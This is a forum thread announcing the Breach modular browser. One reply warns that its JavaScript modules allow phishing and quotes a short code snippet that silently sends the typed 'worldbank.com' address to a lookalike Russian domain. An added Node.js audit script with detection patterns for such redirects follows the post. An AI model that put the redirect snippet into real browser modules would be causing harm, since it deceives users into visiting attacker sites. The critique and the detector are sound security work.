Breach.cc Browser for the HTML5-era

Status
Not open for further replies.

Ink

Breach - breach.cc

Modular
Everything in the browser is a module, a web-app running in its own process.
Construct your own browsing experience by selecting the right modules for you.

Hackable
Want vertical tabs? Write some JS & CSS! Customised autocomplete engine? JS!
Every behavior is programmatic and exposed through APIs.

Open Source
The entire technological stack is open source.
Modify existing modules and create your own to extend the behavior of Breach.

Please note, this is a Public Alpha and currently for Mac and Linux.

A few simple ingredients to make magic happen.

HTML / JS / CSS
The entire UI is built out of interchangeable modules coded in pure Javascript / HTML5.
Each module is a web-app with access to the Breach API.

Chromium
The Chromium Content API is exposed to Node JS through v8 native bindings and multiplexed to modules.
Security and performance are at the heart of the design: tabs and modules run in separate processes.

Node.js
Breach embeds a NodeJS event loop in charge of running the core browser javascript implementation.
Each module is run in its own NodeJS process and interacts with the core browser through IPC.

Find out more: http://breach.cc/2014/07/09/we-ve-come-a-long-way-breach-public-alpha-release.html
 

Cowpipe

I worry about this, the ability to modify the entire browser's functionality with Javascript modules. That gives an awful lot of power to a malicious module, should it manage by whatever means to sneak into the user's Breach browser configuration. In a phishing attack for example, the address bar could be directly modified to display a specific address on detection of a certain page being present. It could simply be set to "http://www.worldbank.com" which would appear to the user that they were on worldbank.com when actually they were visiting "http://scup0u.eqbijnet.ru" or whatever.

A module called mod_strip controls the value of the address box. Perhaps somewhat unknowingly, the devs' own webpage gives the perfect tutorial in how to construct a phishing attack within Breach :p

Changing the behaviour of mod_strip
We're going to add some extra logic to the module, by intercepting a certain string of character submitted in the URL box and associating with it a special action.
Source: http://breach.cc/hack/

The following code will intercept the string "http://www.worldbank.com" and redirect the user to "http://scup0u.eqbijnet.ru" (a pretty lame phishing attack, but it's just a quick and dirty example) ;)

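Code:
socket_submit = function(data) {
  if(data.input === 'http://www.worldbank.com') {
    // The typed address is swapped for a different site before the tab loads
    common._.tabs.action_load("http://scup0u.eqbijnet.ru");
    return;
  }
  // ... remainder of the original socket_submit handler (not shown in the post)
};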

Obviously an actual, real-world attack would be more difficult to implement, and I haven't really been through the full security yet, just glanced over things, but I think the main point of all of this is that for an average user to download and use this browser is almost as dangerous as dropping a baby in the middle of a busy street and giving it a handgun with a brightly coloured trigger...

The more power we give those who don't know how to use it, the more power we are giving those who do.
 
Reactions: KelvinW4 and Oxygen
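
A defensive counterpart to the snippet in the post above, added here as an example and not part of Cowpipe's post or of Breach's code: a Node.js check that reads a module's source as text and flags navigation to a hard-coded URL, in particular when it follows a comparison of the typed input against a different host. The function name `auditModuleSource`, the rule labels and the `.example` hosts are assumptions made for the illustration.

```javascript
// Added illustration: static audit of a module's source text. It never loads
// or runs the module. socket_submit, data.input and action_load are the names
// used in the snippet above; everything else here is hypothetical.

// A navigation call whose target is a string literal instead of user input.
const LOAD_LITERAL = /action_load\(\s*(['"])(.*?)\1\s*\)/g;
// Submitted input compared against a string literal.
const INPUT_LITERAL = /data\.input\s*={2,3}\s*(['"])(.*?)\1/g;

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

function auditModuleSource(source) {
  const findings = [];
  let lastCompared = null; // most recent literal that input was compared with
  source.split('\n').forEach((text, i) => {
    for (const m of text.matchAll(INPUT_LITERAL)) lastCompared = m[2];
    for (const m of text.matchAll(LOAD_LITERAL)) {
      const from = lastCompared && hostOf(lastCompared);
      const to = hostOf(m[2]);
      const crossHost = Boolean(from && to && from !== to);
      findings.push({
        line: i + 1,
        rule: crossHost ? 'input-redirected-to-other-host' : 'hard-coded-navigation',
        target: m[2],
        comparedWith: crossHost ? lastCompared : null,
      });
    }
  });
  return findings;
}

// Constructed samples (placeholder hosts, not real module code).
const SUSPECT_SOURCE = [
  'socket_submit = function(data) {',
  "  if(data.input === 'http://bank.example') {",
  '    common._.tabs.action_load("http://lookalike.example");',
  '    return;',
  '  }',
  '  common._.tabs.action_load(data.input);',
  '};',
].join('\n');
const BENIGN_SOURCE = [
  'socket_submit = function(data) {',
  '  common._.tabs.action_load(data.input);',
  '};',
].join('\n');

console.log(auditModuleSource(SUSPECT_SOURCE));
```

A match is a triage signal for manual review of the module; minified or obfuscated source will not match these patterns.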